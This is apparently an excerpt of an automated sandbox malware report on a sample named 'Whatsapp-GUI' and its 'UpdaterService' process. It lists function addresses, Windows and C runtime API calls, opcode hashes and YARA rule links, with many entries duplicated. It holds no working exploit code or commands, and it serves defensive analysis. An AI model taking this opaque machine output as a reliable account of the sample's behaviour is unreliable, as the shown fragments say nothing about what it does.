Instruction ID: a39f442c47a2c66df02a984e50441cb6ab80ab447516072b1971dfd35e6d8a24
Opcode Fuzzy Hash: e6a838f4327fe25aa99fc929fc9ffb5826bfd92b51cb49c404d0c38610388f25
Instruction Fuzzy Hash: 1D1133B58007499FCB10DF8AD489BEEBBF8EB48324F10841AE519B3200C379A944CFA5

Function 091ED188 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 091EE855

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 3edb5c1cde2956ffb79a5e393fb25dffbce2a234dd9760d98959a5149481fe7c
Instruction ID: 7b2d18c5725b176ad4a2d190fe52e4098b877707716c8517fcccfde9f286d749
Opcode Fuzzy Hash: 3edb5c1cde2956ffb79a5e393fb25dffbce2a234dd9760d98959a5149481fe7c
Instruction Fuzzy Hash: 501103B59006488FDB20DF9AD548B9EBBF4EB48314F20885AD519A7210D379A944CFA5

Function 091E64E0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 091E6545

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c00d79123514137693e839d97dee6355e2e877e11bfe08b565d242de9a7e3cf7
Instruction ID: 2c714f4992b99b7463ec1066184ccaec146a7f07a9600580e9877a82ec67f0af
Opcode Fuzzy Hash: c00d79123514137693e839d97dee6355e2e877e11bfe08b565d242de9a7e3cf7
Instruction Fuzzy Hash: 371110B59002489FCB10DF9AC989BDEBBF8EB58314F10840AE518B3200C379A544CFA1

Function 0A5206C4 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0A520DD7), ref: 0A5217C5

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 3acf84ecd37f4964213177a0f4e9631c9c866c0b701f8972bb0a0935eabfe49b
Instruction ID: e352b2243aec52d2d0c62caba9dca44256d927348944c0588024a63f756af2d9
Opcode Fuzzy Hash: 3acf84ecd37f4964213177a0f4e9631c9c866c0b701f8972bb0a0935eabfe49b
Instruction Fuzzy Hash: 021110B5C006498FDB20DF9AD484A9EBBF4FB49320F14892AD518A3240C378A544CFA5

Function 091EE7F9 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 091EE855

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c31a6cb50fe7bf84c8069ed895932b6d3ee03c4ae47eaf51ecf01355b4c1205b
Instruction ID: af6d31803f80f156c1fa211b3414e6cf4cfa14f398e689381c60a3daedb7a52d
Opcode Fuzzy Hash: c31a6cb50fe7bf84c8069ed895932b6d3ee03c4ae47eaf51ecf01355b4c1205b
Instruction Fuzzy Hash: DD1100B5D006488FCB20DF9AD548BDEBBF4AB48324F24845AD519A7210C379A984CFA4

Function 091E64E8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 091E6545

Memory Dump Source

Source File: 00000000.00000002.3103238636.00000000091E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91e0000_Whatsapp-GUI.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 907c088658f7d839a0a35a9149d6647494c5893bfb3700ead2135667fcaa0b67
Instruction ID: cf98d6498349262ee551f8793e8f2067944dc04e6316b3b7077a6fb04c9bfe20
Opcode Fuzzy Hash: 907c088658f7d839a0a35a9149d6647494c5893bfb3700ead2135667fcaa0b67
Instruction Fuzzy Hash: 341103B59003489FDB10DF9AC448BDEBBF8EB48314F10841AE518A7200C379A544CFA1

Function 0A52BEE8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0A52BF45

Memory Dump Source

Source File: 00000000.00000002.3103916479.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a520000_Whatsapp-GUI.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ca4353cb33326f6eea793b9e779b26993dd85c87e1fd79adbdad0dfcd701cd75
Instruction ID: d5aa0e853676d3f8f1c3e17a4fa2aec4e7f32b7c05e0d832095c11f50c468b07
Opcode Fuzzy Hash: ca4353cb33326f6eea793b9e779b26993dd85c87e1fd79adbdad0dfcd701cd75
Instruction Fuzzy Hash: A411E2B58003499FDB10DF9AC885BDEFBF8FB49320F21845AE518A7250C379A944CFA5

Function 0156D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3098961106.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f459553e451d5936fb348620b1a34e5534e6cd636ef9ed01f9a05dbb2775d6
Instruction ID: 99056ce7cfcdddade14f19e97b9c8d51c6470078121e6e632cf1415693291657
Opcode Fuzzy Hash: 85f459553e451d5936fb348620b1a34e5534e6cd636ef9ed01f9a05dbb2775d6
Instruction Fuzzy Hash: E0210271600240DFCB05DF58C9C0B2ABFB9FB98318F208969D9490F656C33AD406CAE1

Function 0157D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3099059953.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ee4b713d13ff0f03f6f2fe0ea952e052986b0ea341af07c6e3bd5e5327029e
Instruction ID: 1bdfcf89d8571c2fdfbdf7671a4472a6173e81b15060922cfda071a8e8814148
Opcode Fuzzy Hash: 18ee4b713d13ff0f03f6f2fe0ea952e052986b0ea341af07c6e3bd5e5327029e
Instruction Fuzzy Hash: 6021B3716042049FDB05DF98E581B26BBB5FF84324F24C96DD9494F256C33AD446CA61

Function 0157D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3099059953.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a736d69a2a05f951746527f7b519643171ac658b6977bb20f7b3285b591a343b
Instruction ID: 424bd58ed75af175ca6e78bd2876a6a5b931a2bd61415203ee90ea82a6a808f3
Opcode Fuzzy Hash: a736d69a2a05f951746527f7b519643171ac658b6977bb20f7b3285b591a343b
Instruction Fuzzy Hash: D3210075604204DFCB16DF68E985B26BFB5FF88314F20C96DD90A0F256D33AD406CA61

Function 0157D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3099059953.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0b87fb8932297bdb6981f3d67939c8598be28b1db1a6d04a459693dc6ffb99
Instruction ID: b6707d8b41a019acbff81d0a2423f2f46f5c5726744ebd24f1f981e7e0b68659
Opcode Fuzzy Hash: 9a0b87fb8932297bdb6981f3d67939c8598be28b1db1a6d04a459693dc6ffb99
Instruction Fuzzy Hash: 222159755093808FDB03CF24D994B15BF71FF46214F28C5AAD8498F6A7C33A980ACB62

Function 0156D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3098961106.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: cb85b1fff2be240627a794dc9217c7caad0ffcf8f554d1647030732dc83ffc81
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 1F11DF72504280CFCB12CF54D5C4B1ABF71FB98314F24CAA9D9490F656C33AD45ACBA2

Function 0157D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3099059953.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 69767cb1986c14524fc5ce4abbab7a85028a417fa76f94040466edb41167dc40
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 1011BB75504280DFDB02CF54D5C4B19BFB1FF84224F28C6A9D9494F296C33AD40ACB62

Function 0156D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3098961106.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1120d48653b45b9a868a53b98097f128827929e95a3ae258be39ecd76d55bd
Instruction ID: d86194193c3aa9198d9f4f9feefbb18cc7a89cfd56640903a46a78d6dc230787
Opcode Fuzzy Hash: 0d1120d48653b45b9a868a53b98097f128827929e95a3ae258be39ecd76d55bd
Instruction Fuzzy Hash: A901FC7120438099E7104E59CD84B66BFECFF45320F18CD2AED490F246C63D9441CAF2

Function 0156D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3098961106.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_156d000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c645cf36b5cb2593999df5f978b9c18eff910177657dc7851781ad5e07ee729
Instruction ID: a1b25fdb3e8a9d6b62b601cfffc11d100d312ef8a4059f2141321246685afd73
Opcode Fuzzy Hash: 0c645cf36b5cb2593999df5f978b9c18eff910177657dc7851781ad5e07ee729
Instruction Fuzzy Hash: 04F062725043849AE7118E1AD888B66FFACFF45634F18C95AED484F286C37D9844CAB1

Non-executed Functions

Function 0190D55C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3099850594.0000000001900000.00000040.00000800.00020000.00000000.sdmp, Offset: 01900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1900000_Whatsapp-GUI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3244400502db9ec7b8234552176d2661e8b7779f669c5ebfbb568f3baf594bf1
Instruction ID: be6211ddd972d90b76a91fc8d88673a43d55f994c3a48ebeec8968e6e67d5d88
Opcode Fuzzy Hash: 3244400502db9ec7b8234552176d2661e8b7779f669c5ebfbb568f3baf594bf1
Instruction Fuzzy Hash: 3DA18432E00216CFCF26DFB4C84059EBBB6FFC5301B158569E90AAB2A5DB31DA55CB40

Analysis Process: UpdaterService.exePID: 2876, Parent PID: 1288COMMON

Non-executed Functions

Function 045F2CB9 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7551a974f8ec644891ea954f0eeec97f93635307e582e4c9a19c323df10a945
Instruction ID: 77adca8d5c09db2130ddd9ac8852af7c4d5fa48badc26f61e086e76c19c75255
Opcode Fuzzy Hash: a7551a974f8ec644891ea954f0eeec97f93635307e582e4c9a19c323df10a945
Instruction Fuzzy Hash: E5E0267024C2F69FDB0B0B308C00989BF229AD21903884748E5E09B2C3C320994FC684

Function 0467743A Relevance: 18.2, APIs: 12, Instructions: 179COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 046774A0
_wcscmp.LIBCMT ref: 046774AB
_wcscat.LIBCMT ref: 046774C1
_wcsstr.LIBCMT ref: 046774CC
_wcscat.LIBCMT ref: 04677531
_wcscat.LIBCMT ref: 04677538
_wcsncpy.LIBCMT ref: 04677563

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
String ID:
API String ID: 3576275495-0
Opcode ID: 5280a57374f5615685ac48ac45047bfba2899181fd987efb3c460f30339c9cbe
Instruction ID: 14d46cb4eb7c1b32295fbbf3bfec93eab67ceba4ede9100d3c7c2e34b974d7df
Opcode Fuzzy Hash: 5280a57374f5615685ac48ac45047bfba2899181fd987efb3c460f30339c9cbe
Instruction Fuzzy Hash: C64138316002447AFB14BB748C46EBF3BACDF51626F1400AEF805A6191FB75BA0196AD

Function 0467743A Relevance: 18.2, APIs: 12, Instructions: 179COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 046774A0
_wcscmp.LIBCMT ref: 046774AB
_wcscat.LIBCMT ref: 046774C1
_wcsstr.LIBCMT ref: 046774CC
_wcscat.LIBCMT ref: 04677531
_wcscat.LIBCMT ref: 04677538
_wcsncpy.LIBCMT ref: 04677563

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat$_wcscmp_wcscpy_wcsncpy_wcsstr
String ID:
API String ID: 3576275495-0
Opcode ID: 5280a57374f5615685ac48ac45047bfba2899181fd987efb3c460f30339c9cbe
Instruction ID: 14d46cb4eb7c1b32295fbbf3bfec93eab67ceba4ede9100d3c7c2e34b974d7df
Opcode Fuzzy Hash: 5280a57374f5615685ac48ac45047bfba2899181fd987efb3c460f30339c9cbe
Instruction Fuzzy Hash: C64138316002447AFB14BB748C46EBF3BACDF51626F1400AEF805A6191FB75BA0196AD

Function 0467C1C0 Relevance: 12.3, APIs: 8, Instructions: 322COMMON

Download Yara Rule

APIs

Part of subcall function 04633A96: _malloc.LIBCMT ref: 04633AAE

Part of subcall function 0467BFCA: __time64.LIBCMT ref: 0467BFD4

__wsplitpath.LIBCMT ref: 0467C29F

Part of subcall function 04636DCE: __wsplitpath_helper.LIBCMT ref: 04636E0E

_wcscpy.LIBCMT ref: 0467C2B2
_wcscat.LIBCMT ref: 0467C2C5
__wsplitpath.LIBCMT ref: 0467C2EA
_wcscat.LIBCMT ref: 0467C300
_wcscat.LIBCMT ref: 0467C313
_wcscmp.LIBCMT ref: 0467C25A

Part of subcall function 0467C7A1: _wcscmp.LIBCMT ref: 0467C891
Part of subcall function 0467C7A1: _wcscmp.LIBCMT ref: 0467C8A4

_wcsncpy.LIBCMT ref: 0467C530

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat_wcscmp$__wsplitpath$__time64__wsplitpath_helper_malloc_wcscpy_wcsncpy
String ID:
API String ID: 1566690071-0
Opcode ID: cbdb25bb095c1a0354a603b4a31a0ca3df56cc99ff673012826c3fcd726165ae
Instruction ID: 15af9f836788d86004c735164160137b38d816133dc2e1e24a6b40149948a263
Opcode Fuzzy Hash: cbdb25bb095c1a0354a603b4a31a0ca3df56cc99ff673012826c3fcd726165ae
Instruction Fuzzy Hash: B0C11FB1D00219AADF21DF95CC84EDEB7BDEF54314F0040AAE609E7250EB71AE458F65

Function 0467C1C0 Relevance: 12.3, APIs: 8, Instructions: 322COMMON

Download Yara Rule

APIs

Part of subcall function 04633A96: _malloc.LIBCMT ref: 04633AAE

Part of subcall function 0467BFCA: __time64.LIBCMT ref: 0467BFD4

__wsplitpath.LIBCMT ref: 0467C29F

Part of subcall function 04636DCE: __wsplitpath_helper.LIBCMT ref: 04636E0E

_wcscpy.LIBCMT ref: 0467C2B2
_wcscat.LIBCMT ref: 0467C2C5
__wsplitpath.LIBCMT ref: 0467C2EA
_wcscat.LIBCMT ref: 0467C300
_wcscat.LIBCMT ref: 0467C313
_wcscmp.LIBCMT ref: 0467C25A

Part of subcall function 0467C7A1: _wcscmp.LIBCMT ref: 0467C891
Part of subcall function 0467C7A1: _wcscmp.LIBCMT ref: 0467C8A4

_wcsncpy.LIBCMT ref: 0467C530

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat_wcscmp$__wsplitpath$__time64__wsplitpath_helper_malloc_wcscpy_wcsncpy
String ID:
API String ID: 1566690071-0
Opcode ID: cbdb25bb095c1a0354a603b4a31a0ca3df56cc99ff673012826c3fcd726165ae
Instruction ID: 15af9f836788d86004c735164160137b38d816133dc2e1e24a6b40149948a263
Opcode Fuzzy Hash: cbdb25bb095c1a0354a603b4a31a0ca3df56cc99ff673012826c3fcd726165ae
Instruction Fuzzy Hash: B0C11FB1D00219AADF21DF95CC84EDEB7BDEF54314F0040AAE609E7250EB71AE458F65

Function 0466F1F8 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0466F20D
_memcmp.LIBCMT ref: 0466F22F
_memcmp.LIBCMT ref: 0466F247
_memcmp.LIBCMT ref: 0466F25A
_memcmp.LIBCMT ref: 0466F274
_memcmp.LIBCMT ref: 0466F287
_memcmp.LIBCMT ref: 0466F29F
_memcmp.LIBCMT ref: 0466F2BA

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 34fa0fb60bcea54a2c17385dbe50e81113eb4266d2a716df9d85070b8f25c8e5
Instruction ID: 7bf0e9c173a02e791aac6f0d05eff21b2d4ed453ce9038b43debaf1b427fb7de
Opcode Fuzzy Hash: 34fa0fb60bcea54a2c17385dbe50e81113eb4266d2a716df9d85070b8f25c8e5
Instruction Fuzzy Hash: E1214C7E740A15BBE608A9A1BC41F7BB71C9F61649F000035FD02A634AFB15FE118AEC

Function 0466F1F8 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0466F20D
_memcmp.LIBCMT ref: 0466F22F
_memcmp.LIBCMT ref: 0466F247
_memcmp.LIBCMT ref: 0466F25A
_memcmp.LIBCMT ref: 0466F274
_memcmp.LIBCMT ref: 0466F287
_memcmp.LIBCMT ref: 0466F29F
_memcmp.LIBCMT ref: 0466F2BA

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 34fa0fb60bcea54a2c17385dbe50e81113eb4266d2a716df9d85070b8f25c8e5
Instruction ID: 7bf0e9c173a02e791aac6f0d05eff21b2d4ed453ce9038b43debaf1b427fb7de
Opcode Fuzzy Hash: 34fa0fb60bcea54a2c17385dbe50e81113eb4266d2a716df9d85070b8f25c8e5
Instruction Fuzzy Hash: E1214C7E740A15BBE608A9A1BC41F7BB71C9F61649F000035FD02A634AFB15FE118AEC

Function 0467F84F Relevance: 10.8, APIs: 7, Instructions: 280COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0467F983
__swprintf.LIBCMT ref: 0467F9C6
__swprintf.LIBCMT ref: 0467FA1A

Part of subcall function 04636378: __woutput_l.LIBCMT ref: 046363D1

__swprintf.LIBCMT ref: 0467FA68

Part of subcall function 04636378: __flsbuf.LIBCMT ref: 046363F3
Part of subcall function 04636378: __flsbuf.LIBCMT ref: 0463640B

__swprintf.LIBCMT ref: 0467FAB7
__swprintf.LIBCMT ref: 0467FB06
__swprintf.LIBCMT ref: 0467FB55

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __swprintf$__flsbuf$__woutput_l
String ID:
API String ID: 696488392-0
Opcode ID: 1a0dc1cea80da18ec77a019afb7b0724a9b9419e601588f84705e3297ff5f844
Instruction ID: 1fe0b67a0b4ba2d3f3f63a759c45567ca11d48b5fc3d1f8ccd47b593a325364c
Opcode Fuzzy Hash: 1a0dc1cea80da18ec77a019afb7b0724a9b9419e601588f84705e3297ff5f844
Instruction Fuzzy Hash: 69A14EB1508345ABE314EB64C984DAFB7ECEF94709F44492EF585C2190FB30EA09CB66

Function 0467F84F Relevance: 10.8, APIs: 7, Instructions: 280COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0467F983
__swprintf.LIBCMT ref: 0467F9C6
__swprintf.LIBCMT ref: 0467FA1A

Part of subcall function 04636378: __woutput_l.LIBCMT ref: 046363D1

__swprintf.LIBCMT ref: 0467FA68

Part of subcall function 04636378: __flsbuf.LIBCMT ref: 046363F3
Part of subcall function 04636378: __flsbuf.LIBCMT ref: 0463640B

__swprintf.LIBCMT ref: 0467FAB7
__swprintf.LIBCMT ref: 0467FB06
__swprintf.LIBCMT ref: 0467FB55

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __swprintf$__flsbuf$__woutput_l
String ID:
API String ID: 696488392-0
Opcode ID: 1a0dc1cea80da18ec77a019afb7b0724a9b9419e601588f84705e3297ff5f844
Instruction ID: 1fe0b67a0b4ba2d3f3f63a759c45567ca11d48b5fc3d1f8ccd47b593a325364c
Opcode Fuzzy Hash: 1a0dc1cea80da18ec77a019afb7b0724a9b9419e601588f84705e3297ff5f844
Instruction Fuzzy Hash: 69A14EB1508345ABE314EB64C984DAFB7ECEF94709F44492EF585C2190FB30EA09CB66

Function 0466E51D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0466E572
_wcscmp.LIBCMT ref: 0466E5D5
_wcsstr.LIBCMT ref: 0466E5E6
_wcscmp.LIBCMT ref: 0466E62E
_wcscmp.LIBCMT ref: 0466E6AE

Strings

@, xrefs: 0466E542

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp$_wcsstr
String ID: @
API String ID: 3312506106-2766056989
Opcode ID: 0094447e44c56e22e11084c7a8f53b86b57b694dd4af5d1164f6c8f550dfcf6e
Instruction ID: f0cef9cf93f8e17f9863040692bc1411d571ef5cdba15b35f380c4b34b9ca113
Opcode Fuzzy Hash: 0094447e44c56e22e11084c7a8f53b86b57b694dd4af5d1164f6c8f550dfcf6e
Instruction Fuzzy Hash: 1181D435108305AFDB10DF10C984FAA7BE9FF64718F04846AED868A195FB32F945CBA5

Function 0466E51D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0466E572
_wcscmp.LIBCMT ref: 0466E5D5
_wcsstr.LIBCMT ref: 0466E5E6
_wcscmp.LIBCMT ref: 0466E62E
_wcscmp.LIBCMT ref: 0466E6AE

Strings

@, xrefs: 0466E542

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp$_wcsstr
String ID: @
API String ID: 3312506106-2766056989
Opcode ID: 0094447e44c56e22e11084c7a8f53b86b57b694dd4af5d1164f6c8f550dfcf6e
Instruction ID: f0cef9cf93f8e17f9863040692bc1411d571ef5cdba15b35f380c4b34b9ca113
Opcode Fuzzy Hash: 0094447e44c56e22e11084c7a8f53b86b57b694dd4af5d1164f6c8f550dfcf6e
Instruction Fuzzy Hash: 1181D435108305AFDB10DF10C984FAA7BE9FF64718F04846AED868A195FB32F945CBA5

Function 04677D2C Relevance: 9.2, APIs: 6, Instructions: 170COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 04677DC5

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 985e34a7fe0b1f64757abfdaa2b612e85eb51a444b82fa52a8ec8bc951f26ee8
Instruction ID: 8538305c1ff3fe9dd1ed574ba062e15bc275a8443cf1da534317c90fbf20e12d
Opcode Fuzzy Hash: 985e34a7fe0b1f64757abfdaa2b612e85eb51a444b82fa52a8ec8bc951f26ee8
Instruction Fuzzy Hash: 3E5171B2508785ABD724EB60D8809DFB3DCAF95355F40492FA189D3151FF34B288CB6A

Function 04677D2C Relevance: 9.2, APIs: 6, Instructions: 170COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 04677DC5

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 985e34a7fe0b1f64757abfdaa2b612e85eb51a444b82fa52a8ec8bc951f26ee8
Instruction ID: 8538305c1ff3fe9dd1ed574ba062e15bc275a8443cf1da534317c90fbf20e12d
Opcode Fuzzy Hash: 985e34a7fe0b1f64757abfdaa2b612e85eb51a444b82fa52a8ec8bc951f26ee8
Instruction Fuzzy Hash: 3E5171B2508785ABD724EB60D8809DFB3DCAF95355F40492FA189D3151FF34B288CB6A

Function 0467C5C6 Relevance: 9.2, APIs: 6, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 0467C7A1: _wcscmp.LIBCMT ref: 0467C891
Part of subcall function 0467C7A1: _wcscmp.LIBCMT ref: 0467C8A4

_malloc.LIBCMT ref: 0467C6C3
_malloc.LIBCMT ref: 0467C6CD
_free.LIBCMT ref: 0467C70F
_free.LIBCMT ref: 0467C716
_free.LIBCMT ref: 0467C781
_free.LIBCMT ref: 0467C789

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _free$_malloc_wcscmp
String ID:
